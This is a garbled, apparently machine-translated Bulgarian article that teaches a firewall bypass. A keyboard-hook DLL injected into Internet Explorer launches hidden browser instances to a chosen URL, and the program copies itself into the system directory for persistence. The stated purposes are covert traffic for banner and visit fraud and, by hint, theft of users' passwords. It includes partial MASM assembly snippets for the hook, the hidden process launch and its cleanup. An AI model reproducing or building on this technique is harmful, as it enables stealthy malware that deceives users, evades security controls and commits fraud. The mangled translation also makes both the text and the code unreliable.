Прескачането на защитната стена през уеб браузър
В интернет има много статии по темата байпас защитна стена-те. всички те имат своите недостатъци. Докато най-най-добрия начин - въвеждането на процес, към който е разрешен достъп през защитната стена. За изпълнение на код в друг процес, най-добре е да използвате куките на системата. Така че това ще работи на всички прозорци $ системи линия м. Вече има няколко разновидности. Можете да използвате система за смяна на функциите WinAPI или изпълнение на код във функцията, която обработва куката система. В тази статия, аз ще представи сравнително прост начин да се заобиколят защитната стена с клавиши на система кука в браузъра. Функцията ще доведе до още един екземпляр на браузъра в невидим режим, копието на браузъра ще скочи на посочен адреса и всичко това ще се нарича с натискане на «Enter» ключ. Защо имаме нужда и какво ще даде?
За тези, които са в брониран влак, има най-малко 3 начина за използване на браузъра специална покана
URL адрес:
2. страница Насърчаване на посещаемостта, получили доходи от покажи банери. Ако ние не се нуждаем подробности за личния живот на еленовъд от лагера ... или пича от Москва, паролите си и сапун, а след това програмата може да се използва като raskrutchika страница на посещаемост или показване на банери за този много страница. Фактът, че нашата част е невидима за потребителя, не означава, че тя не работи като пълноправен браузър.
Друг от предимствата на този метод:
1. Когато стартирате програмата, се проверява, за да пуснете втора инстанция, се пренаписва в системната директория, създаване на друго копие на себе си (за възстановяване в случай на заличаване и да се получи необходимата URL), създава допълнителна DLL с функция за обработка на кука и инициализира куката на печата ключове.
2. Когато стартирате IE, за да го "отдава" Нашата допълнителен
DLL и обработка на функции се очакват натиснете «Влез».
3. Ако «Влез» натиснат, отнема от друга инстанция на нашия Търсейки URL и причинява друга инстанция на IE.
Също така, функцията трябва да разберете - в Explorer-има, ако тя се вкопчи. Тук всичко е съвсем проста - да се заглавието на прозореца. Последните 17 знака в почти всеки отвори адреса - «Internet Explorer». Вземи заглавие за прозореца е както следва:
позове GetForegroundWindow
.АКО EAX! = 0
позове SendMessage, EAX, WM_GETTEXT, 1024, вр Zagolovok
.ENDIF
След това сравнете последните 17 Zagolovok символите "Interner Explorer». Тук ние Борг облекчи задачата до краен предел.
Функцията трябва да определи дали тя вече е започнала скрита например (става чрез променлива), ако е закрепен (виж по-горе). За да IE, IE повикване в скрит режим с параметъра - URL и след това затворете прозореца скрит. Обадете IE ще го направи:
; ----
.DATA?
DopStr db 6660 мезонети (?)
; ----
; код
; пропускане
; Първи път
позове GetModuleFileName, NULL, вр DopStr, 1024
; инициализация StartupInfo
Mov StartupInfo.cb, Sizeof StartupInfo
MOV StartupInfo.dwFlags, STARTF_USESHOWWINDOW
; Startup - частно
Mov StartupInfo.wShowWindow, SW_HIDE
; от командния ред
позове lstrcat, вр DopStr, вр probel
позове lstrcat, вр DopStr, вр URL
; IE прозорци предизвикателство
позове CreateProcess, NULL, вр DopStr, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, офсет StartupInfo, офсет ProcessInfo
Explorer-като невидим прозорец и след това трябва по някакъв начин да се затвори. Най-добрият начин - да се затвори при затваряне на видно прозорец. В манипулатор, "откъсване"
DLL пишат код като този:
ElseIf причина == DLL_PROCESS_DETACH
.АКО ProcessInfo.hProcess! = 0
позове TerminateProcess, ProcessInfo.hProcess, 0
позове CloseHandle, ProcessInfo.hThread
позове CloseHandle, ProcessInfo.hProcess
.ENDIF
Покажете тази статия на приятел: